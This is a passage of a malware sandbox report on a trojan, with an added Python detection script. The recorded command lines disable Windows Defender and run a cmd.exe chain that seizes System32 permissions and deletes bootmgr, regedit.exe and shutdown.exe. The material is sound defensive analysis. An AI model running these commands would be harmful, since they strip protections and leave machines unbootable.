PID 3176 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
PID 3176 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
PID 4664 wrote to memory of 4324 N/A C:\Users\Admin\AppData\Local\Temp\VSSVC.exe C:\Windows\SysWOW64\cmd.exe
PID 4664 wrote to memory of 4324 N/A C:\Users\Admin\AppData\Local\Temp\VSSVC.exe C:\Windows\SysWOW64\cmd.exe
PID 4664 wrote to memory of 4324 N/A C:\Users\Admin\AppData\Local\Temp\VSSVC.exe C:\Windows\SysWOW64\cmd.exe
PID 4324 wrote to memory of 2888 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 4324 wrote to memory of 2888 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 4324 wrote to memory of 2888 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 4324 wrote to memory of 424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 4324 wrote to memory of 424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 4324 wrote to memory of 424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 4324 wrote to memory of 4988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 4324 wrote to memory of 4988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 4324 wrote to memory of 4988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 4324 wrote to memory of 3868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 4324 wrote to memory of 3868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 4324 wrote to memory of 3868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\icacls.exe
PID 4324 wrote to memory of 2184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 4324 wrote to memory of 2184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe
PID 4324 wrote to memory of 2184 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\takeown.exe

Processes

C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe

"C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disable

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force

C:\Users\Admin\AppData\Local\Temp\VSSVC.exe

"C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && takeown /f C:\Windows\System32\shutdown.exe && icacls C:\Windows\System32\shutdown.exe /grant %username%:F && del C:\Windows\System32\shutdown.exe && Exit

C:\Windows\SysWOW64\takeown.exe

takeown /f C:\Windows\System32

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\System32 /grant Admin:F

C:\Windows\SysWOW64\takeown.exe

takeown /f C:\Windows\System32\drivers

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\System32\drivers /grant Admin:F

C:\Windows\SysWOW64\takeown.exe

takeown /f C:\Windows\System32\LogonUI.exe
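The behavioral1 and behavioral2 Processes sections record the same sequence: four powershell.exe invocations that weaken Defender (Set-MpPreference switches and the DisableAntiSpyware policy value), then the dropped VSSVC.exe launching a cmd.exe /k chain of takeown, icacls, attrib and del commands aimed at System32, bootmgr, regedit.exe and shutdown.exe. The script below is an added example, not part of the sandbox report. It scans those command lines, copied in as constructed sample input, with a small rule set of the kind one would run over process-creation telemetry; the rule names are the example's own and the paths are only those this report shows. It also splits the cmd.exe chain into its steps and compares them with the child processes the report records: steps joined with && run only while the previous step succeeds, and in both runs the Processes list stops after the fifth step (takeown on LogonUI.exe). del and Exit are cmd.exe builtins and would spawn no child in any case, so the listing alone does not show whether the later deletions ran.

```python
import re

# Constructed sample input: (image, command line) pairs copied from the
# "Processes" sections of the behavioral1 and behavioral2 runs in this report.
# Nothing here is executed; the strings are only scanned.
OBSERVED = [
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true'),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent NeverSend'),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disable'),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" New-ItemProperty -Path '
     r"'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force"),
    (r"C:\Users\Admin\AppData\Local\Temp\VSSVC.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"'),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && '
     r"takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && "
     r"takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && "
     r"takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && "
     r"takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && "
     r"takeown /f C:\Windows\System32\shutdown.exe && icacls C:\Windows\System32\shutdown.exe /grant %username%:F && "
     r"del C:\Windows\System32\shutdown.exe && Exit"),
    (r"C:\Windows\SysWOW64\icacls.exe", r"icacls C:\Windows\System32 /grant Admin:F"),
]

# The five child command lines the report records under cmd.exe (PID 772 in
# behavioral1, PID 4324 in behavioral2), in spawn order, with %username%
# already expanded to "Admin" by cmd.exe.
CHILDREN = [
    r"takeown /f C:\Windows\System32",
    r"icacls C:\Windows\System32 /grant Admin:F",
    r"takeown /f C:\Windows\System32\drivers",
    r"icacls C:\Windows\System32\drivers /grant Admin:F",
    r"takeown /f C:\Windows\System32\LogonUI.exe",
]

# Detection rules for the behaviours above. Case-insensitive because cmd.exe
# and PowerShell are. Rule names are this example's own.
RULES = {
    # Set-MpPreference switches that weaken Defender (Impair Defenses, T1562.001).
    "defender_preference_tamper": re.compile(
        r"Set-MpPreference\s+-(?:DisableRealtimeMonitoring|SubmitSamplesConsent|MAPSReporting)\b", re.I),
    # DisableAntiSpyware written under the Defender policy key.
    "defender_policy_tamper": re.compile(
        r"Policies\\Microsoft\\Windows Defender.*\bDisableAntiSpyware\b", re.I),
    # takeown/icacls aimed at System32, regedit.exe or the boot manager.
    "acl_tamper_system_path": re.compile(
        r"\b(?:takeown\s+/f|icacls)\s+(?:C:\\Windows\\System32(?:\\[^\s&]*)?|C:\\Windows\\regedit\.exe|C:\\bootmgr)\b", re.I),
    # Deletion of files the OS needs to boot, shut down or edit the registry.
    "delete_critical_file": re.compile(
        r"\bdel\s+(?:C:\\bootmgr|C:\\Windows\\regedit\.exe|C:\\Windows\\System32\\shutdown\.exe)\b", re.I),
}


def classify(cmdline):
    """Return the names of all rules a single command line triggers, in rule order."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def scan(events):
    """Run the rules over (image, cmdline) pairs; map each rule to the images that fired it."""
    hits = {name: [] for name in RULES}
    for image, cmdline in events:
        for name in classify(cmdline):
            hits[name].append(image)
    return hits


def split_chain(cmdline):
    """Split a 'cmd.exe /k|/c a && b && c' line into its individual steps."""
    m = re.match(r'^"?[^"]*cmd\.exe"?\s+/[kc]\s+(.*)$', cmdline, re.I)
    body = m.group(1) if m else cmdline
    return [step.strip() for step in body.split("&&") if step.strip()]


def executed_prefix(steps, children, username="Admin"):
    """Count how many leading chain steps are matched, in order, by the child
    processes actually observed. cmd.exe runs the next '&&' step only when the
    previous one succeeded, so a short prefix means the chain stopped early.
    'del' and 'Exit' are cmd.exe builtins and never spawn a child; attrib.exe would."""
    n = 0
    for step, child in zip(steps, children):
        if step.replace("%username%", username) != child:
            break
        n += 1
    return n


if __name__ == "__main__":
    for rule, images in scan(OBSERVED).items():
        print(f"{rule}: {len(images)} hit(s)")
    chain = split_chain(OBSERVED[5][1])
    print(f"chain has {len(chain)} steps; {executed_prefix(chain, CHILDREN)} confirmed by child processes")
```

In production the same rules would be applied to Sysmon Event ID 1 or Security 4688 command lines rather than to a sandbox listing; the takeown/icacls rule in particular is worth pairing with the parent image, since VSSVC.exe running from a user's Temp directory and spawning cmd.exe is itself the stronger signal.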

Network

Country  Destination         Domain  Proto
US       93.184.221.240:80   N/A     tcp
US       93.184.220.29:80    N/A     tcp
US       93.184.221.240:80   N/A     tcp
US       93.184.221.240:80   N/A     tcp
NL       13.69.109.130:443   N/A     tcp

Files

memory/3176-132-0x0000000000530000-0x00000000009A6000-memory.dmp

memory/3176-133-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp

memory/4216-134-0x0000000000000000-mapping.dmp

memory/1772-135-0x0000000000000000-mapping.dmp

memory/4480-136-0x0000000000000000-mapping.dmp

memory/3928-137-0x0000000000000000-mapping.dmp

memory/4216-138-0x00000261FADE0000-0x00000261FAE02000-memory.dmp

memory/4664-139-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\VSSVC.exe

MD5 e4f24d91d8e7290ffd6afc8aa01c6d63
SHA1 b552c6af33cc5a62379028687924406cba8ff74d
SHA256 5eb371a9cf91b981502d3ee26880b8c15f62b3eeaaa2484d523a2a03a233bebb
SHA512 ae0d0c2494b0a4753039f4fdf6a589848a44a386b759511aab9374e9446f84c39895ec2c9d00ed0ce3df07663a9f14e2f21f42a85966336b0e35204da0d82e00

memory/4216-142-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp

memory/1772-143-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp

memory/4480-144-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp

memory/3928-145-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp

memory/4664-146-0x0000000000530000-0x0000000000DA4000-memory.dmp

memory/3928-149-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp

memory/4664-150-0x0000000077520000-0x00000000776C3000-memory.dmp

memory/4664-151-0x0000000000530000-0x0000000000DA4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cadef9abd087803c630df65264a6c81c
SHA1 babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256 cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA512 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

memory/4480-155-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp

memory/4216-156-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp

memory/4664-157-0x0000000000530000-0x0000000000DA4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e243a38635ff9a06c87c2a61a2200656
SHA1 ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc
SHA256 af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f
SHA512 4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

memory/4664-159-0x0000000005EC0000-0x0000000006464000-memory.dmp

memory/4664-160-0x0000000005850000-0x00000000058E2000-memory.dmp

memory/1772-161-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp

memory/4664-162-0x0000000005A10000-0x0000000005A1A000-memory.dmp

memory/3176-163-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp

memory/4664-164-0x0000000000530000-0x0000000000DA4000-memory.dmp

memory/4664-165-0x0000000077520000-0x00000000776C3000-memory.dmp

memory/4324-166-0x0000000000000000-mapping.dmp

memory/2888-167-0x0000000000000000-mapping.dmp

memory/424-168-0x0000000000000000-mapping.dmp

memory/4988-169-0x0000000000000000-mapping.dmp

memory/3868-170-0x0000000000000000-mapping.dmp

memory/2184-171-0x0000000000000000-mapping.dmp